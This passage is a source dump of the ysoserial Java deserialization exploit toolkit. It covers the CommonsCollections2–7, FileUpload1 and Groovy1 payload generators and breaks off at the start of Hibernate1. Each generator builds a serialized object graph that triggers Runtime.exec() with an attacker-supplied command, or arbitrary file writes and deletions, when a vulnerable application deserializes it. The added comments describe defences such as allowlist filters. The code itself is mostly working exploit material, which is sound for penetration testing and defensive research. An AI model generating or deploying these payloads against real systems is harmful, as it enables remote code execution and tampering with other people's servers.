import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/*
	Gadget chain:
		ObjectInputStream.readObject()
			PriorityQueue.readObject()
				...
					TransformingComparator.compare()
						InvokerTransformer.transform()
							Method.invoke()
								Runtime.exec()
 */

/**
 * Payload generator for the commons-collections4 chain in the header comment:
 * a PriorityQueue ordered by a TransformingComparator, whose InvokerTransformer
 * calls a named no-argument method on each element being compared.
 *
 * Review/defence notes: PriorityQueue re-orders its elements on
 * deserialization, so the transformer runs on attacker-chosen objects. Later
 * commons-collections4 releases no longer allow the unsafe functor classes
 * such as InvokerTransformer to be deserialized; a deserialization allowlist
 * (java.io.ObjectInputFilter / jdk.serialFilter) covers the case where the
 * library cannot be upgraded.
 */
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.apache.commons:commons-collections4:4.0" })
@Authors({ Authors.FROHOFF })
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command string handed to Gadgets.createTemplatesImpl()
	 * @return a two-element PriorityQueue whose first slot holds the templates object
	 * @throws Exception on any reflection failure
	 */
	public Queue<Object> getObject(final String command) throws Exception {
		final Object templates = Gadgets.createTemplatesImpl(command);
		// mock method name until armed
		// (toString() exists on every object, so the stub comparisons below are harmless)
		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

		// create queue with numbers and basic comparator
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
		// stub data for replacement later
		// (add() invokes the comparator, so the real object must not be in the queue yet)
		queue.add(1);
		queue.add(1);

		// switch method called by comparator
		// (after this the transformer invokes newTransformer() on the compared element)
		Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

		// switch contents of queue
		// (written straight into the backing array, so no comparison happens at build time)
		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
		queueArray[0] = templates;
		queueArray[1] = 1;

		return queue;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections2.class, args);
	}

}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections3.java
================================================
package ysoserial.payloads;

import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

import javax.xml.transform.Templates;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.LazyMap;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

/*
 * Variation on CommonsCollections1 that uses InstantiateTransformer instead of
 * InvokerTransformer.
 */
/**
 * Payload generator for the CommonsCollections1 variation described in the
 * header comment: the transformer list instantiates TrAXFilter with a
 * Templates argument instead of using InvokerTransformer.
 *
 * Review/defence notes: a deny-list that names only InvokerTransformer does
 * not cover this variant, because the work is done by InstantiateTransformer.
 * A deserialization allowlist (java.io.ObjectInputFilter / jdk.serialFilter)
 * is the more reliable control; later commons-collections releases also refuse
 * to deserialize the unsafe functor classes by default. The payload is gated
 * on a JDK-version precondition, see isApplicableJavaVersion().
 */
@SuppressWarnings({"rawtypes", "unchecked", "restriction"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<Object> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command string handed to Gadgets.createTemplatesImpl()
	 * @return the invocation handler wrapping the Map proxy
	 * @throws Exception on any reflection failure
	 */
	public Object getObject(final String command) throws Exception {
		Object templatesImpl = Gadgets.createTemplatesImpl(command);

		// inert chain for setup
		// (the helpers below may touch the map; with only a ConstantTransformer nothing runs locally)
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		// TrAXFilter.class -> new TrAXFilter(templatesImpl) via its (Templates) constructor
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(TrAXFilter.class),
				new InstantiateTransformer(
						new Class[] { Templates.class },
						new Object[] { templatesImpl } )};

		final Map innerMap = new HashMap();

		// LazyMap.get() on a missing key calls the transformer to produce a value
		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

		// same proxy/handler wrapping as CommonsCollections1 - see Gadgets for the actual construction
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return handler;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections3.class, args);
	}

	/** Precondition named by the PayloadTest annotation; delegates to JavaVersion.isAnnInvHUniversalMethodImpl(). */
	public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAnnInvHUniversalMethodImpl();
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections4.java
================================================
package ysoserial.payloads;

import java.util.PriorityQueue;
import java.util.Queue;

import javax.xml.transform.Templates;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

/*
 * Variation on CommonsCollections2 that uses InstantiateTransformer instead of
 * InvokerTransformer.
 */
/**
 * Payload generator for the CommonsCollections2 variation described in the
 * header comment: the PriorityQueue's TransformingComparator runs a
 * ConstantTransformer followed by an InstantiateTransformer instead of an
 * InvokerTransformer.
 *
 * Review/defence notes: a deny-list that names only InvokerTransformer does
 * not cover this variant. A deserialization allowlist
 * (java.io.ObjectInputFilter / jdk.serialFilter) that does not admit the
 * commons-collections4 functor classes or TrAXFilter stops the chain.
 */
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections4 implements ObjectPayload<Queue<Object>> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command string handed to Gadgets.createTemplatesImpl()
	 * @return a two-element PriorityQueue ordered by the armed transformer chain
	 * @throws Exception on any reflection failure
	 */
	public Queue<Object> getObject(final String command) throws Exception {
		Object templates = Gadgets.createTemplatesImpl(command);

		// placeholder constant; replaced with TrAXFilter.class when arming
		ConstantTransformer constant = new ConstantTransformer(String.class);

		// mock method name until armed
		// (while unarmed the chain evaluates to new String("foo"), which is harmless)
		Class[] paramTypes = new Class[] { String.class };
		Object[] args = new Object[] { "foo" };
		InstantiateTransformer instantiate = new InstantiateTransformer(
				paramTypes, args);

		// grab defensively copied arrays
		// (the local arrays are re-pointed at the transformer's own copies so they can be edited in place later)
		paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
		args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

		ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

		// create queue with numbers
		// (add() invokes the comparator, which is why the chain is still unarmed here)
		PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
		queue.add(1);
		queue.add(1);

		// swap in values to arm
		// (the chain now evaluates to new TrAXFilter(templates))
		Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
		paramTypes[0] = Templates.class;
		args[0] = templates;

		return queue;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections4.class, args);
	}
}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections5.java
================================================
package ysoserial.payloads;

import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

import javax.management.BadAttributeValueExpException;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/*
	Gadget chain:
        ObjectInputStream.readObject()
            BadAttributeValueExpException.readObject()
                TiedMapEntry.toString()
                    LazyMap.get()
                        ChainedTransformer.transform()
                            ConstantTransformer.transform()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Class.getMethod()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.getRuntime()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.exec()

	Requires:
		commons-collections
 */
/*
This only works in JDK 8u76 and WITHOUT a security manager

https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
 */
/**
 * Payload generator for the commons-collections 3.x chain in the header
 * comment, entered through BadAttributeValueExpException: its "val" field
 * holds a TiedMapEntry, and the chain header shows readObject() reaching
 * TiedMapEntry.toString() and from there LazyMap.get().
 *
 * Review/defence notes: the author's note above states that this works only
 * without a security manager, and the payload is gated on a JDK-version
 * precondition (isApplicableJavaVersion()). The transformer list ends in
 * Runtime.exec(String), so the runtime symptom is a JVM spawning a child
 * process. Later commons-collections releases refuse to deserialize the unsafe
 * functor classes by default; a deserialization allowlist
 * (java.io.ObjectInputFilter / jdk.serialFilter) covers the case where the
 * library cannot be upgraded.
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.MATTHIASKAISER, Authors.JASINNER })
public class CommonsCollections5 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command string, passed as the single argument of Runtime.exec(String)
	 * @return a BadAttributeValueExpException whose val field is the TiedMapEntry
	 * @throws Exception on any reflection failure
	 */
	public BadAttributeValueExpException getObject(final String command) throws Exception {
		final String[] execArgs = new String[] { command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
		        new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		// Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(command) -> constant 1
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		// LazyMap.get() on a missing key calls the transformer to produce a value
		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

		// the key "foo" is absent from innerMap, so reading the entry's value goes through the transformer
		TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

		// constructed with null and then set by reflection, so the entry is stored as-is
		// rather than being processed by the constructor
		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
		Field valfield = val.getClass().getDeclaredField("val");
        Reflections.setAccessible(valfield);
		valfield.set(val, entry);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return val;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections5.class, args);
	}

    /** Precondition named by the PayloadTest annotation; delegates to JavaVersion.isBadAttrValExcReadObj(). */
    public static boolean isApplicableJavaVersion() {
        return JavaVersion.isBadAttrValExcReadObj();
    }

}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections6.java
================================================
package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.io.Serializable;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

/*
	Gadget chain:
	    java.io.ObjectInputStream.readObject()
            java.util.HashSet.readObject()
                java.util.HashMap.put()
                java.util.HashMap.hash()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()
                            org.apache.commons.collections.functors.ChainedTransformer.transform()
                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

    by @matthias_kaiser

    Reviewer notes (defensive reading):
      - The chain starts at ObjectInputStream.readObject(); it is only reachable where an
        application deserializes bytes it does not control, with the library named in
        @Dependencies below on its classpath.
      - The trigger is a plain java.util.HashSet, so filtering on the outer type alone does
        not help. The distinguishing classes are the commons-collections ones listed above
        (TiedMapEntry, LazyMap, ChainedTransformer, InvokerTransformer); their names appear
        in the stream's class descriptors, which is what an allow-list ObjectInputFilter or
        a detection rule can key on.
      - Mitigation is at the first step: do not deserialize untrusted data, or restrict the
        accepted classes with an allow-list filter.
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.MATTHIASKAISER })
public class CommonsCollections6 extends PayloadRunner implements ObjectPayload<Serializable> {

    /*
        Builds the HashSet described in the gadget-chain comment on this class.

        command: the single string handed to Runtime.exec(String) by the last InvokerTransformer.
        Returns the HashSet whose only element has been replaced, by reflection, with a
        TiedMapEntry over a LazyMap.
        Throws any reflection failure (NoSuchFieldException, ClassNotFoundException, ...)
        if none of the expected internal field names exist on this JRE.
    */
    public Serializable getObject(final String command) throws Exception {

        final String[] execArgs = new String[] { command };

        // Reflective call sequence expressed as data:
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(command).
        // The trailing ConstantTransformer makes the chain's final result the constant 1.
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, execArgs),
                new ConstantTransformer(1) };

        Transformer transformerChain = new ChainedTransformer(transformers);

        final Map innerMap = new HashMap();

        // Per the chain above, LazyMap.get() is the step that calls into the transformer chain.
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        // Per the chain above, TiedMapEntry.hashCode() -> getValue() -> lazyMap.get("foo").
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        // The set is populated with a harmless placeholder first. The real entry is never
        // passed to add(), so HashMap.put()/hash() is not run on it in this method.
        HashSet map = new HashSet(1);
        map.add("foo");
        // Locate the HashSet's backing map field.
        // NOTE(review): "backingMap" is presumably the field name on a different class
        // library implementation - confirm which runtimes this fallback targets.
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        Reflections.setAccessible(f);
        HashMap innimpl = (HashMap) f.get(map);

        // Locate the HashMap's bucket array ("table", or "elementData" as fallback name).
        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        Reflections.setAccessible(f2);
        Object[] array = (Object[]) f2.get(innimpl);

        // Only buckets 0 and 1 are inspected for the placeholder's node.
        // NOTE(review): assumes the table has two buckets for HashSet(1) - if both are
        // null, node stays null and the getClass() call below throws.
        Object node = array[0];
        if(node == null){
            node = array[1];
        }

        // Find the node's "key" field; the fallback looks it up on java.util.MapEntry.
        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        // Swap the placeholder key for the TiedMapEntry directly in the node.
        Reflections.setAccessible(keyField);
        keyField.set(node, entry);

        return map;

    }

    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections6.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections7.java
================================================
package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

/*
    Payload method chain:

    java.util.Hashtable.readObject
    java.util.Hashtable.reconstitutionPut
    org.apache.commons.collections.map.AbstractMapDecorator.equals
    java.util.AbstractMap.equals
    org.apache.commons.collections.map.LazyMap.get
    org.apache.commons.collections.functors.ChainedTransformer.transform
    org.apache.commons.collections.functors.InvokerTransformer.transform
    java.lang.reflect.Method.invoke
    sun.reflect.DelegatingMethodAccessorImpl.invoke
    sun.reflect.NativeMethodAccessorImpl.invoke
    sun.reflect.NativeMethodAccessorImpl.invoke0
    java.lang.Runtime.exec

    Reviewer notes (defensive reading):
      - The outer object is a plain java.util.Hashtable; the chain depends on key equality
        being evaluated while the table is rebuilt during readObject.
      - It needs the commons-collections version named in @Dependencies on the classpath of
        the deserializing application. The LazyMap / ChainedTransformer / InvokerTransformer
        class names in the stream are what an allow-list ObjectInputFilter or a detection
        rule can key on.
      - Mitigation is at the first step: do not deserialize untrusted data, or restrict the
        accepted classes with an allow-list filter.
*/

@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI})

public class CommonsCollections7 extends PayloadRunner implements ObjectPayload<Hashtable> {

    /*
        Builds the Hashtable described in the chain comment on this class.

        command: the single string handed to Runtime.exec(String) by the last InvokerTransformer.
        Returns a Hashtable whose two keys are LazyMaps with equal hash codes.
        Statement order matters here: the real transformers are installed only after both
        put() calls, so those calls run against an empty chain.
    */
    public Hashtable getObject(final String command) throws Exception {

        // Reusing transformer chain and LazyMap gadgets from previous payloads
        final String[] execArgs = new String[]{command};

        // Starts with an empty transformer array; the real one is set by reflection below.
        final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(command),
        // with a final ConstantTransformer that makes the chain's result the constant 1.
        final Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                execArgs),
            new ConstantTransformer(1)};

        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();

        // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
        // ("yy" and "zZ" have the same String.hashCode(), and both map to the value 1.)
        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
        lazyMap1.put("yy", 1);

        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
        lazyMap2.put("zZ", 1);

        // Use the colliding Maps as keys in Hashtable
        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);

        // Install the real transformers only now, after the table has been populated.
        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

        // Needed to ensure hash collision after previous manipulations
        // NOTE(review): presumably the second put() compared the two maps and the lookup of
        // "yy" on lazyMap2 left a "yy" entry behind; removing it restores the single-key
        // state - confirm against LazyMap.get().
        lazyMap2.remove("yy");

        return hashtable;
    }

    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections7.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/DynamicDependencies.java
================================================
package ysoserial.payloads;


/**
 * Marker interface with no members.
 *
 * In this listing it is implemented by Hibernate1 and Hibernate2, which carry no
 * {@code @Dependencies} annotation and instead expose a static
 * {@code getDependencies()} method returning Maven coordinates chosen at run time.
 * NOTE(review): how callers discover that static method is not visible here - confirm
 * in the code that consumes this interface.
 *
 * @author mbechler
 *
 */
public interface DynamicDependencies {

}


================================================
FILE: src/main/java/ysoserial/payloads/FileUpload1.java
================================================
package ysoserial.payloads;


import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.util.Arrays;

import org.apache.commons.codec.binary.Base64;
import org.apache.commons.fileupload.disk.DiskFileItem;
import org.apache.commons.io.output.DeferredFileOutputStream;
import org.apache.commons.io.output.ThresholdingOutputStream;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 * Gadget chain:
 * DiskFileItem.readObject()
 *
 * Arguments:
 * - copyAndDelete;sourceFile;destDir
 * - write;destDir;ascii-data
 * - writeB64;destDir;base64-data
 * - writeOld;destFile;ascii-data
 * - writeOldB64;destFile;base64-data
 *
 * Yields:
 * - copy an arbitrary file to an arbitrary directory (source file is deleted if possible)
 * - pre 1.3.1 (+ old JRE): write data to an arbitrary file
 * - 1.3.1+: write data to a more or less random file in an arbitrary directory
 *
 * Reviewer notes (defensive reading):
 * - Unlike the command-execution payloads in this package, the effect here is a file
 *   write, copy or delete on the deserializing host, performed by DiskFileItem itself.
 * - The only library class that has to be accepted by the stream is DiskFileItem (plus
 *   the commons-io stream it holds), so an allow-list ObjectInputFilter that omits
 *   commons-fileupload types stops it at the first step.
 * - The argument string is split on ';' with no limit, so data containing ';' does not
 *   match any of the three-part forms and is rejected with IllegalArgumentException.
 *
 * @author mbechler
 */
@Dependencies ( {
    "commons-fileupload:commons-fileupload:1.3.1",
    "commons-io:commons-io:2.4"
} )
@PayloadTest(harness="ysoserial.test.payloads.FileUploadTest", precondition = "isApplicableJavaVersion", flaky = "possible race condition")
@Authors({ Authors.MBECHLER })
public class FileUpload1 implements ReleaseableObjectPayload<DiskFileItem> {
    /**
     * Precondition named in {@code @PayloadTest}: delegates to JavaVersion.isAtLeast(7).
     */
    public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAtLeast(7);
    }

    /**
     * Parses the {@code mode;arg1;arg2} argument and builds the matching DiskFileItem.
     *
     * @param command one of the five forms listed in the class comment
     * @return the prepared DiskFileItem
     * @throws IllegalArgumentException if the string does not split into exactly three
     *         parts or the first part is not a known mode
     */
    public DiskFileItem getObject ( String command ) throws Exception {

        String[] parts = command.split(";");

        if ( parts.length == 3 && "copyAndDelete".equals(parts[ 0 ]) ) {
            return copyAndDelete(parts[ 1 ], parts[ 2 ]);
        }
        else if ( parts.length == 3 && "write".equals(parts[ 0 ]) ) {
            return write(parts[ 1 ], parts[ 2 ].getBytes("US-ASCII"));
        }
        else if ( parts.length == 3 && "writeB64".equals(parts[ 0 ]) ) {
            return write(parts[ 1 ], Base64.decodeBase64(parts[ 2 ]));
        }
        else if ( parts.length == 3 && "writeOld".equals(parts[ 0 ]) ) {
            return writePre131(parts[ 1 ], parts[ 2 ].getBytes("US-ASCII"));
        }
        else if ( parts.length == 3 && "writeOldB64".equals(parts[ 0 ]) ) {
            return writePre131(parts[ 1 ], Base64.decodeBase64(parts[ 2 ]));
        }
        else {
            throw new IllegalArgumentException("Unsupported command " + command + " " + Arrays.toString(parts));
        }
    }


    /**
     * Replaces the item's "dfos" field with a fresh DeferredFileOutputStream(0, null)
     * once the caller is done with the object.
     */
    public void release ( DiskFileItem obj ) throws Exception {
        // otherwise the finalizer deletes the file
        DeferredFileOutputStream dfos = new DeferredFileOutputStream(0, null);
        Reflections.setFieldValue(obj, "dfos", dfos);
    }

    // threshold 0 with one byte of data: the "thresh < written length" case described in makePayload
    private static DiskFileItem copyAndDelete ( String copyAndDelete, String copyTo ) throws IOException, Exception {
        return makePayload(0, copyTo, copyAndDelete, new byte[1]);
    }


    // writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
    // threshold is data.length + 1, i.e. above the written length; the "/whatever" output
    // file name is a fixed dummy under the same directory
    private static DiskFileItem write ( String dir, byte[] data ) throws IOException, Exception {
        return makePayload(data.length + 1, dir, dir + "/whatever", data);
    }


    // writes data to an arbitrary file
    // the repository path is the target file name with a NUL character appended
    // NOTE(review): presumably relies on old JREs truncating paths at NUL, matching the
    // "pre 1.3.1 (+ old JRE)" remark in the class comment - confirm
    private static DiskFileItem writePre131 ( String file, byte[] data ) throws IOException, Exception {
        return makePayload(data.length + 1, file + "\0", file, data);
    }


    /**
     * Assembles a DiskFileItem whose internal stream state is set by reflection.
     *
     * @param thresh   threshold given to the DeferredFileOutputStream
     * @param repoPath path used as the item's repository
     * @param filePath path used as the stream's output file
     * @param data     bytes placed in the stream's in-memory buffer
     */
    private static DiskFileItem makePayload ( int thresh, String repoPath, String filePath, byte[] data ) throws IOException, Exception {
        // if thresh < written length, delete outputFile after copying to repository temp file
        // otherwise write the contents to repository temp file
        File repository = new File(repoPath);
        DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository);
        File outputFile = new File(filePath);
        DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
        // write into the in-memory buffer directly, bypassing the stream's own write path
        OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
        os.write(data);
        // then set the byte counter by hand to match the buffered length
        Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
        Reflections.setFieldValue(diskFileItem, "dfos", dfos);
        Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
        return diskFileItem;
    }


    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(FileUpload1.class, args);
    }

}


================================================
FILE: src/main/java/ysoserial/payloads/Groovy1.java
================================================
package ysoserial.payloads;

import java.lang.reflect.InvocationHandler;
import java.util.Map;

import org.codehaus.groovy.runtime.ConvertedClosure;
import org.codehaus.groovy.runtime.MethodClosure;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;

/*
	Gadget chain (as listed by the author):
		ObjectInputStream.readObject()
			PriorityQueue.readObject()
				Comparator.compare() (Proxy)
					ConvertedClosure.invoke()
						MethodClosure.call()
							...
						  		Method.invoke()
									Runtime.exec()

	Requires:
		groovy

	Reviewer notes (defensive reading):
		- NOTE(review): the listing above names PriorityQueue and Comparator.compare(),
		  but getObject() hooks the Map method "entrySet" on a Map proxy and wraps it
		  with Gadgets.createMemoizedInvocationHandler(); the listing may be stale.
		  Confirm the actual outer trigger in Gadgets.
		- The Groovy classes involved are ConvertedClosure and MethodClosure; an
		  allow-list ObjectInputFilter that omits org.codehaus.groovy.runtime types
		  stops the chain before either is instantiated.
 */

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
@Authors({ Authors.FROHOFF })
public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

	/*
		Wraps a MethodClosure for the "execute" method of the command string in a
		ConvertedClosure bound to the method name "entrySet", exposes it as a Map
		proxy, and returns the invocation handler produced by Gadgets for that map.
	*/
	public InvocationHandler getObject(final String command) throws Exception {
		final MethodClosure executeOnCommand = new MethodClosure(command, "execute");
		final ConvertedClosure entrySetHook = new ConvertedClosure(executeOnCommand, "entrySet");
		final Map proxiedMap = Gadgets.createProxy(entrySetHook, Map.class);
		return Gadgets.createMemoizedInvocationHandler(proxiedMap);
	}

	// Entry point: forwards this class and the arguments to PayloadRunner.run().
	public static void main(final String[] args) throws Exception {
		final String[] runnerArgs = args;
		PayloadRunner.run(Groovy1.class, runnerArgs);
	}
}


================================================
FILE: src/main/java/ysoserial/payloads/Hibernate1.java
================================================
package ysoserial.payloads;


import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Map;
import java.util.HashMap;

